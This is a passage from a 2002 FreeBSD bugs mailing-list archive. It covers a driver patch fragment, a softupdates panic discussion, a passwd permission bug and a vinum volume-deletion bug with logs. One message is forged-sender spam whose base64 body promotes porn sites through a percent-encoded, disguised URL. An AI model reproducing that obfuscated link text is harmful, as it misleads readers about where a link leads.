+#ifdef DEVICE_POLLING + int rxcycles; +#endif /* DEVICE_POLLING */ }; #endif /* _EM_H_DEFINED_ */ >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 28 18:57:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DA35537B400; Fri, 28 Jun 2002 18:57:09 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5434C43E09; Fri, 28 Jun 2002 18:57:09 -0700 (PDT) (envelope-from silby@FreeBSD.org) Received: from freefall.freebsd.org (silby@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5T1v9JU067781; Fri, 28 Jun 2002 18:57:09 -0700 (PDT) (envelope-from silby@freefall.freebsd.org) Received: (from silby@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5T1v90G067777; Fri, 28 Jun 2002 18:57:09 -0700 (PDT) Date: Fri, 28 Jun 2002 18:57:09 -0700 (PDT) From: Mike Silbersack Message-Id: <200206290157.g5T1v90G067777@freefall.freebsd.org> To: morten@codemonkey.dk, silby@FreeBSD.org, freebsd-bugs@FreeBSD.org, silby@FreeBSD.org Subject: Re: kern/39974: fxp driver doesn't detect the 82562 chipset on Intel EthernetExpress NICs Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: fxp driver doesn't detect the 82562 chipset on Intel EthernetExpress NICs State-Changed-From-To: open->patched State-Changed-By: silby State-Changed-When: Fri Jun 28 18:56:24 PDT 2002 State-Changed-Why: Committed to -current, will be MFC'd to -stable very soon. Thanks for the patch! Responsible-Changed-From-To: freebsd-bugs->silby Responsible-Changed-By: silby Responsible-Changed-When: Fri Jun 28 18:56:24 PDT 2002 Responsible-Changed-Why: Committed to -current, will be MFC'd to -stable very soon. Thanks for the patch! http://www.freebsd.org/cgi/query-pr.cgi?pr=39974 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 29 2:53:52 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 34D1A37B400; Sat, 29 Jun 2002 02:53:47 -0700 (PDT) Received: from aol.com (reflexfm.xs4all.nl [213.84.164.227]) by mx1.FreeBSD.org (Postfix) with SMTP id F057643E1A; Sat, 29 Jun 2002 02:53:43 -0700 (PDT) (envelope-from dan@aol.com) Received: from [191.192.64.202] by asy100.as122.sol-superunderline.com with NNFMP; Sat, 29 Jun 0102 14:03:41 -0400 Reply-To: Message-ID: <001d06a63d1a$6732a1c3$3bb14cc3@ajlcqu> From: To: dan@FreeBSD.ORG Subject: re Date: Sat, 29 Jun 0102 00:47:27 +0900 MiME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_00E6_66C05A0B.E1628D88" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: QUALCOMM Windows Eudora Version 5.1 Importance: Normal Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ------=_NextPart_000_00E6_66C05A0B.E1628D88 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: base64 aGkgPGJyPjxicj4NCg0Kd2hhdCBhIGdvb2QgaWRlYSB0byBtYWtlIGEgbGlz dCBvZiB0aGUgYmVzdCBmcmVlIHBvcm4gc2l0ZXMgb2YgdGhlIHdlYiEgPGJy Pg0KYW5kIHlvdSBhcmUgc3VyZSB0byBmaW5kIHdoYXQgeW91IGxpa2U6IDxi cj4NCnJlYWwgYW1hdGV1cnMsIGZldGlzaGlzbSwgbGVzYmlhbnMsIGJsYWNr cywgcGlzcy4uLiA8YnI+DQp5b3UgbXVzdCB2aXNpdCB0aGlzIGZyZWUgd2Vi IHNpdGU6ICh5ZXMgcmVhbGx5IGZyZWUhISkgPGJyPg0KY29weSB0aGlzIGFk ZHJlc3Mgb24geW91ciBicm93c2VyIDogPGJyPiA8YnI+DQoNCmh0dHA6Ly8x NDQyMTVAd3d3LiUzMSUzNSUzNCUzMiUzMSUzOSUzOCUzNyUzNSUzMiUzNiUz NCUzOCUzNSUzMy4lNjMlNmYlNmQNCjxicj48YnI+DQpEYW4gPGJyPjxicj4N Cg0KDQozNzAyY3pLajYtOGwxMA== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 29 5:10: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B7EB937B408 for ; Sat, 29 Jun 2002 05:10:06 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id D0FE743E21 for ; Sat, 29 Jun 2002 05:10:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5TCA4JU076519 for ; Sat, 29 Jun 2002 05:10:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5TCA3QM076518; Sat, 29 Jun 2002 05:10:03 -0700 (PDT) Date: Sat, 29 Jun 2002 05:10:03 -0700 (PDT) Message-Id: <200206291210.g5TCA3QM076518@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: David Schultz Subject: Re: kern/28465: Enabling softupdates on a clean but active filesystem can panic the kernel Reply-To: David Schultz Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/28465; it has been noted by GNATS. From: David Schultz To: freebsd-gnats-submit@FreeBSD.org, umesh@juniper.net, dima@unixfreak.org Cc: Subject: Re: kern/28465: Enabling softupdates on a clean but active filesystem can panic the kernel Date: Sat, 29 Jun 2002 05:00:07 -0700 I suspect that after the filesystem is downgraded to read-only, there is still some dirty data in the buffer cache. In that case, tunefs does the right thing by merely checking that the filesystem is mounted read-only; mount does the wrong thing by returning before syncing the filesystem. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 29 6:40:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0E7F337B405 for ; Sat, 29 Jun 2002 06:40:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id A8BD943E0A for ; Sat, 29 Jun 2002 06:40:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5TDe2JU002553 for ; Sat, 29 Jun 2002 06:40:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5TDe2ac002552; Sat, 29 Jun 2002 06:40:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9239837B400 for ; Sat, 29 Jun 2002 06:33:14 -0700 (PDT) Received: from mail.thundernet.cz (mail.thundernet.cz [62.77.87.114]) by mx1.FreeBSD.org (Postfix) with SMTP id 3F96843E06 for ; Sat, 29 Jun 2002 06:33:13 -0700 (PDT) (envelope-from roman@bellavista.cz) Received: (qmail 29017 invoked from network); 29 Jun 2002 13:31:21 -0000 Received: from unknown (HELO freepuppy.bellavista.cz) (62.168.44.50) by mail.thundernet.cz with SMTP; 29 Jun 2002 13:31:21 -0000 Received: from freepuppy.bellavista.cz (localhost.bellavista.cz [127.0.0.1]) by freepuppy.bellavista.cz (8.12.5/8.11.6) with ESMTP id g5TDXAEB000392 for ; Sat, 29 Jun 2002 15:33:10 +0200 (CEST) (envelope-from roman@freepuppy.bellavista.cz) Received: (from roman@localhost) by freepuppy.bellavista.cz (8.12.5/8.12.4/Submit) id g5TDX9Zk000391; Sat, 29 Jun 2002 15:33:09 +0200 (CEST) Message-Id: <200206291333.g5TDX9Zk000391@freepuppy.bellavista.cz> Date: Sat, 29 Jun 2002 15:33:09 +0200 (CEST) From: Roman Neuhauser Reply-To: Roman Neuhauser To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39995: users not in @wheel cannot change their passwords Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39995 >Category: bin >Synopsis: users not in @wheel cannot change their passwords >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Jun 29 06:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Roman Neuhauser >Release: FreeBSD 4.6-STABLE i386 >Organization: >Environment: System: FreeBSD freepuppy.bellavista.cz 4.6-STABLE FreeBSD 4.6-STABLE #0: Sat Jun 29 15:10:05 CEST 2002 root@freepuppy.bellavista.cz:/usr/obj/usr/src/sys/FREEPUPPY2_2 i386 >Description: users which are not in the wheel group get "permission denied" after typing "passwd" roman@freepuppy ~ > su -m 102:0 Password: root@freepuppy ~ # su -m prema 101:0 freepuppy% passwd passwd: Permission denied freepuppy% echo $? 1 freepuppy% >How-To-Repeat: obvious from the description >Fix: none known to me. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 29 7:40:46 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 982D537B405 for ; Sat, 29 Jun 2002 07:40:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5313343E09 for ; Sat, 29 Jun 2002 07:40:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5TEe3JU012131 for ; Sat, 29 Jun 2002 07:40:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5TEe3sg012130; Sat, 29 Jun 2002 07:40:03 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 576E237B400 for ; Sat, 29 Jun 2002 07:35:53 -0700 (PDT) Received: from flake.decibel.org (flake.decibel.org [216.254.40.10]) by mx1.FreeBSD.org (Postfix) with SMTP id 71BA043E06 for ; Sat, 29 Jun 2002 07:35:52 -0700 (PDT) (envelope-from decibel@decibel.org) Received: (qmail 35093 invoked by uid 1001); 29 Jun 2002 14:35:51 -0000 Message-Id: <20020629143551.35089.qmail@flake.decibel.org> Date: 29 Jun 2002 14:35:51 -0000 From: "Jim C.Nasby" Reply-To: "Jim C.Nasby" To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: misc/40001: vinum showing -2 drives after removing several stale objects Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 40001 >Category: misc >Synopsis: vinum showing -2 drives after removing several stale objects >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Jun 29 07:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Jim C. Nasby >Release: FreeBSD 4.6-RELEASE-p1 i386 >Organization: >Environment: System: FreeBSD flake.decibel.org 4.6-RELEASE-p1 FreeBSD 4.6-RELEASE-p1 #4: Wed Jun 26 22:36:41 CDT 2002 root@flake.decibel.org:/usr/obj/usr/src/sys/FLAKE1 i386 Asus P2B-DS, dual 40G IDE, no SCSI in use >Description: I recently moved this machine from a 4x9G SCSI vinum array to 2x40G IDE. I left the original configuration alone until I was certain that everything was working fine. Today I decided to delete the old devices... I deleted the subdisks without a problem (not shown below), then I decided to delete all the other old devices in one script. After running that script, vinum reported -2 drives. The system appears to be functioning normally right now, but I'm worried about what will happen when I reboot. >How-To-Repeat: Here's what I ran... root@flake:~/vinum#vinum l 2 drives: D v0 State: up Device /dev/ad0s1h Avail: 10431/39103 MB (26%) D v1 State: up Device /dev/ad2s1h Avail: 10431/39103 MB (26%) D vinum0 State: referenced Device Avail: 0/0 MB D vinum1 State: referenced Device Avail: 0/0 MB D vinum2 State: referenced Device Avail: 0/0 MB D vinum3 State: referenced Device Avail: 0/0 MB 15 volumes: V mirror1a State: up Plexes: 2 Size: 0 B V mirror1b State: up Plexes: 2 Size: 0 B V raid10-1 State: up Plexes: 2 Size: 0 B V raid10-2 State: up Plexes: 2 Size: 0 B V raid0-1 State: up Plexes: 1 Size: 0 B V raid0-2 State: up Plexes: 1 Size: 0 B V raid5-1 State: down Plexes: 1 Size: 0 B V raid5-2 State: down Plexes: 1 Size: 0 B V raid5-3 State: down Plexes: 1 Size: 0 B V raid0-3 State: up Plexes: 1 Size: 0 B V mirror0 State: up Plexes: 2 Size: 1024 MB V mirror1 State: up Plexes: 2 Size: 1024 MB V mirror2 State: up Plexes: 2 Size: 1024 MB V mirror3 State: up Plexes: 2 Size: 5120 MB V mirror4 State: up Plexes: 2 Size: 20 GB 24 plexes: P mirror1a.p0 C State: up Subdisks: 0 Size: 0 B P mirror1a.p1 C State: faulty Subdisks: 0 Size: 0 B P mirror1b.p0 C State: up Subdisks: 0 Size: 0 B P mirror1b.p1 C State: faulty Subdisks: 0 Size: 0 B P raid10-1.p0 S State: up Subdisks: 0 Size: 0 B P raid10-1.p1 S State: faulty Subdisks: 0 Size: 0 B P raid10-2.p0 S State: up Subdisks: 0 Size: 0 B P raid10-2.p1 S State: faulty Subdisks: 0 Size: 0 B P raid0-1.p0 S State: up Subdisks: 0 Size: 0 B P raid0-2.p0 S State: up Subdisks: 0 Size: 0 B P raid5-1.p0 R5 State: faulty Subdisks: 0 Size: 0 B P raid5-2.p0 R5 State: faulty Subdisks: 0 Size: 0 B P raid5-3.p0 R5 State: faulty Subdisks: 0 Size: 0 B P raid0-3.p0 S State: up Subdisks: 0 Size: 0 B P mirror0.p0 C State: up Subdisks: 1 Size: 1024 MB P mirror0.p1 C State: faulty Subdisks: 1 Size: 1024 MB P mirror1.p0 C State: up Subdisks: 1 Size: 1024 MB P mirror1.p1 C State: up Subdisks: 1 Size: 1024 MB P mirror2.p0 C State: up Subdisks: 1 Size: 1024 MB P mirror2.p1 C State: up Subdisks: 1 Size: 1024 MB P mirror3.p0 C State: up Subdisks: 1 Size: 5120 MB P mirror3.p1 C State: up Subdisks: 1 Size: 5120 MB P mirror4.p0 C State: up Subdisks: 1 Size: 20 GB P mirror4.p1 C State: up Subdisks: 1 Size: 20 GB 10 subdisks: S mirror0.p0.s0 State: up PO: 0 B Size: 1024 MB S mirror0.p1.s0 State: stale PO: 0 B Size: 1024 MB S mirror1.p0.s0 State: up PO: 0 B Size: 1024 MB S mirror2.p0.s0 State: up PO: 0 B Size: 1024 MB S mirror3.p0.s0 State: up PO: 0 B Size: 5120 MB S mirror4.p0.s0 State: up PO: 0 B Size: 20 GB S mirror1.p1.s0 State: up PO: 0 B Size: 1024 MB S mirror2.p1.s0 State: up PO: 0 B Size: 1024 MB S mirror3.p1.s0 State: up PO: 0 B Size: 5120 MB S mirror4.p1.s0 State: up PO: 0 B Size: 20 GB vinum rm -f mirror1a.p0 vinum rm -f mirror1a.p1 vinum rm -f mirror1b.p0 vinum rm -f mirror1b.p1 vinum rm -f raid10-1.p0 vinum rm -f raid10-1.p1 vinum rm -f raid10-2.p0 vinum rm -f raid10-2.p1 vinum rm -f raid0-1.p0 vinum rm -f raid0-2.p0 vinum rm -f raid5-1.p0 vinum rm -f raid5-2.p0 vinum rm -f raid5-3.p0 vinum rm -f raid0-3.p0 vinum rm -f mirror1a vinum rm -f mirror1b vinum rm -f raid10-1 vinum rm -f raid10-2 vinum rm -f raid0-1 vinum rm -f raid0-2 vinum rm -f raid5-1 vinum rm -f raid5-2 vinum rm -f raid5-3 vinum rm -f raid0-3 vinum rm -f vinum0 vinum rm -f vinum1 vinum rm -f vinum2 vinum rm -f vinum3 -2 drives: 5 volumes: V mirror0 State: up Plexes: 2 Size: 1024 MB V mirror1 State: up Plexes: 2 Size: 1024 MB V mirror2 State: up Plexes: 2 Size: 1024 MB V mirror3 State: up Plexes: 2 Size: 5120 MB V mirror4 State: up Plexes: 2 Size: 20 GB 10 plexes: P mirror0.p0 C State: up Subdisks: 1 Size: 1024 MB P mirror0.p1 C State: up Subdisks: 1 Size: 1024 MB P mirror1.p0 C State: up Subdisks: 1 Size: 1024 MB P mirror1.p1 C State: up Subdisks: 1 Size: 1024 MB P mirror2.p0 C State: up Subdisks: 1 Size: 1024 MB P mirror2.p1 C State: up Subdisks: 1 Size: 1024 MB P mirror3.p0 C State: up Subdisks: 1 Size: 5120 MB P mirror3.p1 C State: up Subdisks: 1 Size: 5120 MB P mirror4.p0 C State: up Subdisks: 1 Size: 20 GB P mirror4.p1 C State: up Subdisks: 1 Size: 20 GB 10 subdisks: S mirror0.p0.s0 State: up PO: 0 B Size: 1024 MB S mirror0.p1.s0 State: up PO: 0 B Size: 1024 MB S mirror1.p0.s0 State: up PO: 0 B Size: 1024 MB S mirror2.p0.s0 State: up PO: 0 B Size: 1024 MB S mirror3.p0.s0 State: up PO: 0 B Size: 5120 MB S mirror4.p0.s0 State: up PO: 0 B Size: 20 GB S mirror1.p1.s0 State: up PO: 0 B Size: 1024 MB S mirror2.p1.s0 State: up PO: 0 B Size: 1024 MB S mirror3.p1.s0 State: up PO: 0 B Size: 5120 MB S mirror4.p1.s0 State: up PO: 0 B Size: 20 GB Relevant section of vinum_history: 29 Jun 2002 14:15:27.378789 *** vinum started *** 29 Jun 2002 14:15:27.400686 l 29 Jun 2002 14:15:39.058035 *** vinum started *** 29 Jun 2002 14:15:47.938778 rm -f mirror1a.p0.s0 29 Jun 2002 14:15:52.358709 rm -f mirror1a.p1.s0 ... Deleted first two subdisks by hand, decided that was dumb way to do it... ... 29 Jun 2002 14:16:05.926442 *** vinum started *** 29 Jun 2002 14:16:05.927934 ls 29 Jun 2002 14:16:19.788996 *** vinum started *** 29 Jun 2002 14:16:19.790145 ls 29 Jun 2002 14:16:45.868258 *** vinum started *** 29 Jun 2002 14:16:45.869424 ls 29 Jun 2002 14:16:52.950559 *** vinum started *** 29 Jun 2002 14:16:52.951633 ls 29 Jun 2002 14:17:41.468489 *** vinum started *** 29 Jun 2002 14:17:41.469593 rm -f mirror1b.p0.s0 29 Jun 2002 14:17:41.474948 *** vinum started *** 29 Jun 2002 14:17:41.477068 rm -f mirror1b.p1.s0 29 Jun 2002 14:17:41.481625 *** vinum started *** 29 Jun 2002 14:17:41.482704 rm -f raid10-1.p0.s0 29 Jun 2002 14:17:41.492691 *** vinum started *** 29 Jun 2002 14:17:41.493766 rm -f raid10-1.p0.s1 29 Jun 2002 14:17:41.497289 *** vinum started *** 29 Jun 2002 14:17:41.498320 rm -f raid10-1.p1.s0 29 Jun 2002 14:17:41.501845 *** vinum started *** 29 Jun 2002 14:17:41.506278 rm -f raid10-1.p1.s1 29 Jun 2002 14:17:41.509005 *** vinum started *** 29 Jun 2002 14:17:41.510014 rm -f raid10-2.p0.s0 29 Jun 2002 14:17:41.513084 *** vinum started *** 29 Jun 2002 14:17:41.514015 rm -f raid10-2.p0.s1 29 Jun 2002 14:17:41.520697 *** vinum started *** 29 Jun 2002 14:17:41.521771 rm -f raid10-2.p1.s0 29 Jun 2002 14:17:41.525461 *** vinum started *** 29 Jun 2002 14:17:41.526495 rm -f raid10-2.p1.s1 29 Jun 2002 14:17:41.530814 *** vinum started *** 29 Jun 2002 14:17:41.531807 rm -f raid0-1.p0.s0 29 Jun 2002 14:17:41.536992 *** vinum started *** 29 Jun 2002 14:17:41.538082 rm -f raid0-1.p0.s1 29 Jun 2002 14:17:41.542642 *** vinum started *** 29 Jun 2002 14:17:41.543685 rm -f raid0-1.p0.s2 29 Jun 2002 14:17:41.547001 *** vinum started *** 29 Jun 2002 14:17:41.548044 rm -f raid0-1.p0.s3 29 Jun 2002 14:17:41.554476 *** vinum started *** 29 Jun 2002 14:17:41.555455 rm -f raid0-2.p0.s0 29 Jun 2002 14:17:41.558660 *** vinum started *** 29 Jun 2002 14:17:41.562059 rm -f raid0-2.p0.s1 29 Jun 2002 14:17:41.567424 *** vinum started *** 29 Jun 2002 14:17:41.568444 rm -f raid0-2.p0.s2 29 Jun 2002 14:17:41.574597 *** vinum started *** 29 Jun 2002 14:17:41.575545 rm -f raid0-2.p0.s3 29 Jun 2002 14:17:41.582930 *** vinum started *** 29 Jun 2002 14:17:41.584012 rm -f raid5-1.p0.s0 29 Jun 2002 14:17:41.589220 *** vinum started *** 29 Jun 2002 14:17:41.592011 rm -f raid5-1.p0.s1 29 Jun 2002 14:17:41.600584 *** vinum started *** 29 Jun 2002 14:17:41.602740 rm -f raid5-1.p0.s2 29 Jun 2002 14:17:41.607043 *** vinum started *** 29 Jun 2002 14:17:41.608057 rm -f raid5-1.p0.s3 29 Jun 2002 14:17:41.615888 *** vinum started *** 29 Jun 2002 14:17:41.616923 rm -f raid5-2.p0.s0 29 Jun 2002 14:17:41.624318 *** vinum started *** 29 Jun 2002 14:17:41.626653 rm -f raid5-2.p0.s1 29 Jun 2002 14:17:41.634373 *** vinum started *** 29 Jun 2002 14:17:41.636341 rm -f raid5-2.p0.s2 29 Jun 2002 14:17:41.641340 *** vinum started *** 29 Jun 2002 14:17:41.642292 rm -f raid5-2.p0.s3 29 Jun 2002 14:17:41.649652 *** vinum started *** 29 Jun 2002 14:17:41.650679 rm -f raid5-3.p0.s0 29 Jun 2002 14:17:41.656836 *** vinum started *** 29 Jun 2002 14:17:41.657847 rm -f raid5-3.p0.s1 29 Jun 2002 14:17:41.665685 *** vinum started *** 29 Jun 2002 14:17:41.666787 rm -f raid5-3.p0.s2 29 Jun 2002 14:17:41.671401 *** vinum started *** 29 Jun 2002 14:17:41.673923 rm -f raid5-3.p0.s3 29 Jun 2002 14:17:41.677816 *** vinum started *** 29 Jun 2002 14:17:41.678771 rm -f raid0-3.p0.s0 29 Jun 2002 14:17:41.687589 *** vinum started *** 29 Jun 2002 14:17:41.688593 rm -f raid0-3.p0.s1 29 Jun 2002 14:17:41.694894 *** vinum started *** 29 Jun 2002 14:17:41.695909 rm -f raid0-3.p0.s2 29 Jun 2002 14:17:41.703604 *** vinum started *** 29 Jun 2002 14:17:41.704586 rm -f raid0-3.p0.s3 ... End of first script, everything looked fine after this (see vinum l from above> ... 29 Jun 2002 14:17:45.549374 *** vinum started *** 29 Jun 2002 14:17:45.550478 l 29 Jun 2002 14:17:59.970521 *** vinum started *** 29 Jun 2002 14:17:59.971610 start mirror0.p1.s0 ... Noticed stale mirror, restarted ... 29 Jun 2002 14:18:43.081578 *** vinum started *** 29 Jun 2002 14:18:43.082752 lp 29 Jun 2002 14:18:49.335174 *** vinum started *** 29 Jun 2002 14:18:49.336404 lp 29 Jun 2002 14:18:51.327384 *** vinum started *** 29 Jun 2002 14:18:51.328582 lp 29 Jun 2002 14:18:55.634482 *** vinum started *** 29 Jun 2002 14:18:55.635714 lp 29 Jun 2002 14:19:03.110201 *** vinum started *** 29 Jun 2002 14:19:03.111504 l 29 Jun 2002 14:19:09.511237 *** vinum started *** 29 Jun 2002 14:19:09.512839 lv 29 Jun 2002 14:19:13.715137 *** vinum started *** 29 Jun 2002 14:19:13.718209 ld 29 Jun 2002 14:19:25.861908 *** vinum started *** 29 Jun 2002 14:19:25.863721 lp 29 Jun 2002 14:19:31.631663 *** vinum started *** 29 Jun 2002 14:19:31.633704 lv 29 Jun 2002 14:19:36.995931 *** vinum started *** 29 Jun 2002 14:19:36.997019 ld ... All the l commands to build the script ... 29 Jun 2002 14:17:59.971610 start mirror0.p1.s0 ...Not sure why this appears here... 29 Jun 2002 14:20:29.039603 *** vinum started *** 29 Jun 2002 14:20:29.040689 rm -f mirror1a.p0 29 Jun 2002 14:20:29.045648 *** vinum started *** 29 Jun 2002 14:20:29.046799 rm -f mirror1a.p1 29 Jun 2002 14:20:29.050263 *** vinum started *** 29 Jun 2002 14:20:29.051249 rm -f mirror1b.p0 29 Jun 2002 14:20:29.057906 *** vinum started *** 29 Jun 2002 14:20:29.058974 rm -f mirror1b.p1 29 Jun 2002 14:20:29.067428 *** vinum started *** 29 Jun 2002 14:20:29.068775 rm -f raid10-1.p0 29 Jun 2002 14:20:29.074397 *** vinum started *** 29 Jun 2002 14:20:29.075894 rm -f raid10-1.p1 29 Jun 2002 14:20:29.079337 *** vinum started *** 29 Jun 2002 14:20:29.080292 rm -f raid10-2.p0 29 Jun 2002 14:20:29.083678 *** vinum started *** 29 Jun 2002 14:20:29.088177 rm -f raid10-2.p1 29 Jun 2002 14:20:29.091323 *** vinum started *** 29 Jun 2002 14:20:29.092311 rm -f raid0-1.p0 29 Jun 2002 14:20:29.095530 *** vinum started *** 29 Jun 2002 14:20:29.096537 rm -f raid0-2.p0 29 Jun 2002 14:20:29.102865 *** vinum started *** 29 Jun 2002 14:20:29.103859 rm -f raid5-1.p0 29 Jun 2002 14:20:29.107411 *** vinum started *** 29 Jun 2002 14:20:29.108663 rm -f raid5-2.p0 29 Jun 2002 14:20:29.112138 *** vinum started *** 29 Jun 2002 14:20:29.113145 rm -f raid5-3.p0 29 Jun 2002 14:20:29.117091 *** vinum started *** 29 Jun 2002 14:20:29.118106 rm -f raid0-3.p0 29 Jun 2002 14:20:29.123366 *** vinum started *** 29 Jun 2002 14:20:29.124336 rm -f mirror1a 29 Jun 2002 14:20:29.128188 *** vinum started *** 29 Jun 2002 14:20:29.132418 rm -f mirror1b 29 Jun 2002 14:20:29.135579 *** vinum started *** 29 Jun 2002 14:20:29.136545 rm -f raid10-1 29 Jun 2002 14:20:29.140284 *** vinum started *** 29 Jun 2002 14:20:29.141490 rm -f raid10-2 29 Jun 2002 14:20:29.146446 *** vinum started *** 29 Jun 2002 14:20:29.147430 rm -f raid0-1 29 Jun 2002 14:20:29.152498 *** vinum started *** 29 Jun 2002 14:20:29.153513 rm -f raid0-2 29 Jun 2002 14:20:29.157032 *** vinum started *** 29 Jun 2002 14:20:29.157979 rm -f raid5-1 29 Jun 2002 14:20:29.163972 *** vinum started *** 29 Jun 2002 14:20:29.165119 rm -f raid5-2 29 Jun 2002 14:20:29.168746 *** vinum started *** 29 Jun 2002 14:20:29.170470 rm -f raid5-3 29 Jun 2002 14:20:29.175963 *** vinum started *** 29 Jun 2002 14:20:29.176929 rm -f raid0-3 29 Jun 2002 14:20:29.180659 *** vinum started *** 29 Jun 2002 14:20:29.181961 rm -f vinum0 29 Jun 2002 14:20:29.184796 *** vinum started *** 29 Jun 2002 14:20:29.185802 rm -f vinum1 29 Jun 2002 14:20:29.190040 *** vinum started *** 29 Jun 2002 14:20:29.191080 rm -f vinum2 29 Jun 2002 14:20:29.195926 *** vinum started *** 29 Jun 2002 14:20:29.196891 rm -f vinum3 ... Script done, drives now MIA ... 29 Jun 2002 14:20:31.815699 *** vinum started *** 29 Jun 2002 14:20:31.816782 l 29 Jun 2002 14:20:51.591544 *** vinum started *** 29 Jun 2002 14:20:51.592632 l 29 Jun 2002 14:22:43.093075 *** vinum started *** 29 Jun 2002 14:22:43.094124 l 29 Jun 2002 14:29:55.536649 *** vinum started *** 29 Jun 2002 14:29:55.537762 l >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Jun 29 8:30:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3FD2D37B400 for ; Sat, 29 Jun 2002 08:30:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id F3DD843E09 for ; Sat, 29 Jun 2002 08:30:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org 